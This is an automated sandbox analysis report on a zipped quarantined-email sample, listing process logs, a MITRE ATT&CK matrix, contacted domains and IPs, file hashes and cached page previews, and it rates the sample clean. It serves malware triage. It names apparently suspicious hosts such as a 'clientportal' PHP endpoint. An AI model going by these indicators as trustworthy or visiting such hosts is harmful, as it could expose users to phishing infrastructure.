Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Process Discovery		Remote ServicesData from Local System2
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder		1
DLL Side-Loading		1
Rundll32		LSASS Memory14
System Information Discovery		Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder		1
Process Injection		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer		Traffic DuplicationData Destruction

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    		unknown
    clientportal65265.org
    		172.67.148.116
    		truefalse
      		unknown
      maoe.is-a-player.com
      		132.226.118.109
      		truefalse
        		unknown
        challenges.cloudflare.com
        		104.18.95.41
        		truefalse
          		unknown
          www.google.com
          		142.250.184.196
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://clientportal65265.org/salimre/agg.phpfalse
              		unknown
              http://maoe.is-a-player.com/false
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                52.113.194.132
                		unknownUnited States
                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                142.250.184.196
                		www.google.comUnited States
                		15169GOOGLEUSfalse
                1.1.1.1
                		unknownAustralia
                		13335CLOUDFLARENETUSfalse
                52.109.89.18
                		unknownUnited States
                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                104.18.94.41
                		unknownUnited States
                		13335CLOUDFLARENETUSfalse
                104.18.95.41
                		challenges.cloudflare.comUnited States
                		13335CLOUDFLARENETUSfalse
                142.251.168.84
                		unknownUnited States
                		15169GOOGLEUSfalse
                142.250.181.238
                		unknownUnited States
                		15169GOOGLEUSfalse
                239.255.255.250
                		unknownReserved
                		unknownunknownfalse
                52.109.28.47
                		unknownUnited States
                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                2.19.126.160
                		unknownEuropean Union
                		16625AKAMAI-ASUSfalse
                172.67.148.116
                		clientportal65265.orgUnited States
                		13335CLOUDFLARENETUSfalse
                142.250.186.164
                		unknownUnited States
                		15169GOOGLEUSfalse
                35.190.80.1
                		a.nel.cloudflare.comUnited States
                		15169GOOGLEUSfalse
                132.226.118.109
                		maoe.is-a-player.comUnited States
                		16989UTMEMUSfalse
                172.217.16.195
                		unknownUnited States
                		15169GOOGLEUSfalse
                20.50.201.205
                		unknownUnited States
                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                Private

                IP
                192.168.2.18

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1524377
                Start date and time:2024-10-02 17:57:13 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Sample name:Quarantined Messages(9).zip
                Detection:CLEAN
                Classification:clean2.winZIP@23/18@20/137
                Cookbook Comments:
                • Found application associated with file extension: .zip

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe
                • Excluded IPs from analysis (whitelisted): 20.242.39.171
                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • VT rate limit hit for: Quarantined Messages(9).zip

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:data
                Category:dropped
                Size (bytes):231348
                Entropy (8bit):4.386628794825291
                Encrypted:false
                SSDEEP:
                MD5:FBAABFC276A093B71106EC6E2EF02B28
                SHA1:E580852F2E00C752855130885A8C57B14B27922A
                SHA-256:FE24C72214DFD3107768C2DEBB9AE59F8F8C782E2CA74ACDABB78EF89E206B6C
                SHA-512:35D28CEABE8A0DE945374907A3ACE3C9A1EF950A54C8DA65BF75C99213F78E899C4B50C451135A4DDE194D524F09EC6CA5C9DA8A65CC31305A860F5FB879657E
                Malicious:false
                Reputation:unknown
                Preview:TH02...... ..v..........SM01X...,...................IPM.Activity...........h...............h............H..h|........!.....h.........p..H..h\nor ...ppDa...hhz..0.........h.9............h........_`9k...h.8.@...I..w...h....H...8.>k...0....T...............d.........2h...............k..............!h.............. h/k..........#h....8.........$h.p......8....."h.n.......l....'h..............1h.9.<.........0h....4....>k../h....h.....>kH..hhs..p...|.....-h .............+h.:.....p................... ..............F7..............FIPM.Activity....Form....Standard....Journal Entry...IPM.Microsoft.FolderDesign.FormsDescription................F.k..........1122110020000000.GwwMicrosoft...This form is used to create journal entries.........kf...... ..........&...........(.......(... ...@.....................................................................................................................fffffffff........wwwwwwww.p....pp..............p...............pw..............pw..DDDDO..

                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E8870E4F-8B6C-4496-8C17-656501B90D19

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):177088
                Entropy (8bit):5.286750267334744
                Encrypted:false
                SSDEEP:
                MD5:289730214FE14B41329CFF67F408F28C
                SHA1:2539F2C20072152ED92724F7592D8C414C1C1713
                SHA-256:2CABDACDF1431ECCE1A4C341D3A0D58862F8446B825645DCB5E9C06A75438321
                SHA-512:C89ED8D4E12DA6AA12E796FEAD57CA4D91289E86F4A341BAD8C3F6FA4E5DFAE8963A1ACEAE846AE8069EBB53A0A790B7D044CC2A3F5AEFDCA8FEF2D057868032
                Malicious:false
                Reputation:unknown
                Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-02T15:59:09">.. Build: 16.0.18112.40129-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[

                C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-journal

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:SQLite Rollback Journal
                Category:dropped
                Size (bytes):4616
                Entropy (8bit):0.1384465837476566
                Encrypted:false
                SSDEEP:
                MD5:6EBCC22A106424F7FAE353658A980AD7
                SHA1:BA80DD5BC11C804C9DEEB4A9EEA37704BD329F43
                SHA-256:EFE0648B5E8D757E1E6FF456542DC38B8BA2901D9F8FD45A3DD0BF86FFB66534
                SHA-512:D6E799308C53DF068A9FD46319CA60FA407EB00E7A91E5FE48EBF940121C34A32E4E31137D4256F6D83036DAC660BA3C20A9E771C1A9361BE95502EEA42F188E
                Malicious:false
                Reputation:unknown
                Preview:.... .c.......V....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ ..........................................................................K.................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                Download File
                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                File Type:data
                Category:dropped
                Size (bytes):30
                Entropy (8bit):1.2389205950315936
                Encrypted:false
                SSDEEP:
                MD5:6260499B0375B441FE1991C4243DDFAB
                SHA1:DC8B2ED2286F5D5CB32CB9930F187599AD83DAD7
                SHA-256:E6092E2911E0F3CAF0FE442F2D06258FF5A7068BDADDB31AE68EAEAB66A5168B
                SHA-512:2AA429FDA76B2994B9D49CEEC13DE822A49CE84FAE046832A8321D5B307DC98F718FAECF237F94D9DE1194DB899887A79F12B27B0006E370C3177CE23BEAB2AD
                Malicious:false
                Reputation:unknown
                Preview:.....L........................

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 14:59:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9910010306703807
                Encrypted:false
                SSDEEP:
                MD5:9C5CF584DCDC12997242BB29D8B01ACE
                SHA1:97D5937D28BCEE01AFAEF9F4F334405FEF966E01
                SHA-256:3E0DF307FDCF0BB8EEA4F10F241AD72BE40429D09D13776CEB5FDA84260CEFF6
                SHA-512:25766E8EA98A5FF8FDEDF6C3235226B9D9ED9D6691D9BAA8C2CE97213EC2FD8D969D98560EDF79F2E38C5F0602307D922E14CE68598F8ECA8A644FDADD23B5D6
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....ye.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VBYl......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2691
                Entropy (8bit):4.002673014998024
                Encrypted:false
                SSDEEP:
                MD5:7E18C454C78D805DC7EE0E119467B352
                SHA1:B922134FC3E04D0B3387665DCC2F518F19BBCF42
                SHA-256:A1BA39DDBB8F2946E758144748D0B5754AC2BA29B2B25819D368CC0FC9D1444A
                SHA-512:54D31E5520F4700F4E523FA9E04BFE7BECD283995970067B62C87352CCB611AD5092A47FB5EFD653D84AB8382168C83C20305ECAD11C100DD25CD26521CA8537
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 14:59:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):3.98946769007113
                Encrypted:false
                SSDEEP:
                MD5:DCDF543CC4D4EDCC3D76B895C3834DF7
                SHA1:95B48A5474A0DC575575888B99705472859DDD70
                SHA-256:5779E0305629A23CE1DF917C91245851A1E771157279F3EA8678827D00EC0D65
                SHA-512:33B8A1977140A7D464182F3AD09C282CDDC97795E19AB8E82C8241CBEF8828EFC0117FC11F406034B992BA7C480A1B9A15581345538E713538576FB4DF41434D
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....M^.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VBYl......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 2 14:59:22 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2681
                Entropy (8bit):3.98691414611879
                Encrypted:false
                SSDEEP:
                MD5:E3FD71C2C80343AD6ECE01FCF757CB11
                SHA1:D3DFBAC427CC2334340852134B7FE297441CE869
                SHA-256:D7B24CC00FB24CF62E58A1D51873D7EC1E7390D49C272E2A9B2D71E6B01C6064
                SHA-512:4C558C429FBEC5ED7E3F567D993486B8EF1EB0475637DE9220C5C55F0832FF17418FEDE67D3DBB845E9A1C79C654630625275D945ABE64E7B9B97370D74BC849
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,....x.S.........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IBYJ.....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VBYj.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VBYj.....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VBYj............................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VBYl......#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                Chrome Cache Entry: 76

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:HTML document, ASCII text, with very long lines (1195), with no line terminators
                Category:downloaded
                Size (bytes):1195
                Entropy (8bit):5.205384363607051
                Encrypted:false
                SSDEEP:
                MD5:F1673318C9298FE4798BB311A511E731
                SHA1:201399F82A7AE4D8BB415BB2138B178915C12000
                SHA-256:32BEAD40A10753F7725BCAE01E2FED48D9DB2E3253BF30D5E263E92A066C040D
                SHA-512:C921DD85D5C030F48489300E890DC003874E75A096861A5BC7409833AE067BA88CE197B099A1BCBAE302EDF275E558972943D9C18B7171B30F3E442313079D9D
                Malicious:false
                Reputation:unknown
                URL:https://clientportal65265.org/salimre/agg.php
                Preview:<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8cc5e78fd8c9c44f',t:'MTcyNzg4NDgxOC4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);el

                Chrome Cache Entry: 77

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                Category:dropped
                Size (bytes):61
                Entropy (8bit):3.990210155325004
                Encrypted:false
                SSDEEP:
                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                Malicious:false
                Reputation:unknown
                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                Chrome Cache Entry: 78

                Download File
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:PNG image data, 9 x 100, 8-bit/color RGB, non-interlaced
                Category:downloaded
                Size (bytes):61
                Entropy (8bit):4.068159130770306
                Encrypted:false
                SSDEEP:
                MD5:16042314C19B6E7D2E5D8F1362B6DF15
